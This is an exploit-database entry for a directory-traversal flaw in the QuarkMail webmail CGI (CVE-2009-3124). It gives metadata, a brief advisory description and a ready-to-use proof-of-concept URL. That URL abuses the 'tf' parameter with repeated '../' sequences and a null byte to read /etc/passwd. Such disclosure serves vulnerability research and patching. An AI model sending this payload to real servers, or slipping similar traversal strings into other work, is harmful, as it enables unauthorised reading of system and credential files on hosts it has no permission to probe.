QuarkMail - 'tf' Directory Traversal

Author: Securitylab.ir
type: webapps
platform: php
port: 
date_added: 2009-08-28  
date_updated: 2014-10-03  
verified: 1  
codes: CVE-2009-3124;OSVDB-57911  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 34875.txt  
source: https://www.securityfocus.com/bid/44226/info

QuarkMail is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

http://www.example.com/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes